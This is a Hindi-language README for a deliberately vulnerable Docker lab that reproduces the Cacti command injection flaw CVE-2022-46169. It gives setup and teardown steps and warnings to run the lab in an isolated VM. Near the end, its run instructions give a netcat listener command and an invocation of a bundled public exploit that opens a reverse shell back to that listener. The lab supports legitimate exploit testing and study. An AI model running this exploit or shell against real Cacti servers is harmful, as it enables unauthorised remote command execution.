
चेतावनी: यह Cacti कमांड इंजेक्शन (CVE-2022-46169) के शोषण का परीक्षण करने के लिए एक कमजोर एप्लिकेशन है। इसे अपने जोखिम पर चलाएँ!
यह Cacti भेद्यता (CVE-2022-46169) के लिए एक्सप्लॉइट का परीक्षण करने हेतु एक असुरक्षित एप्लिकेशन है।
इस एप्लिकेशन में गंभीर सुरक्षा भेद्यताएँ हैं। इसे अपने जोखिम पर चलाएँ! एक बैकअप किए हुए और सुरक्षित वातावरण (जैसे हालिया स्नैपशॉट और host-only नेटवर्किंग वाला VM) का उपयोग करने की अनुशंसा की जाती है। इस एप्लिकेशन को किसी भी इंटरनेट-सामना करने वाले सर्वर पर अपलोड न करें, क्योंकि वे समझौता कर लिए जाएँगे।
अस्वीकरण: मैं इस बात की ज़िम्मेदारी नहीं लेता कि कोई भी इस एप्लिकेशन का उपयोग किस तरह से करता है। इस एप्लिकेशन का एकमात्र उद्देश्य CVE-2022-46169 एक्सप्लॉइट के लिए एक परीक्षण परिदृश्य होना है और इसका दुर्भावनापूर्ण उपयोग नहीं किया जाना चाहिए। यदि इस एप्लिकेशन की स्थापना के माध्यम से आपका सर्वर समझौता किया जाता है, तो यह मेरी ज़िम्मेदारी नहीं है, यह उन व्यक्तियों की ज़िम्मेदारी है जिन्होंने इसे अपलोड और स्थापित किया है।
वातावरण को सेटअप करने के चरण यहाँ दिए गए हैं:
docker compose up -d चलाएँ।admin/admin हैं।कंटेनर को vuln-cacti कहा जाएगा।
वातावरण को teardown करने के लिए docker compose down कमांड का उपयोग करें।
Cacti की आधिकारिक स्थापना मार्गदर्शिका यहाँ पाई जा सकती है।
भेद्यता का विस्तृत मूल कारण यहाँ उपलब्ध है।
Exploit-DB पर एक सार्वजनिक एक्सप्लॉइट उपलब्ध है। इसे सरलता के लिए exploit/ फ़ोल्डर के अंतर्गत कॉपी किया गया है।
इसे चलाने के लिए:
nc -lvp 6669
./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
host.docker.internal का उपयोग किया जाता है (संदर्भ)।vulhub रिपॉजिटरी में भी एक प्रविष्टि है।
यह प्रोजेक्ट Unlicense के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।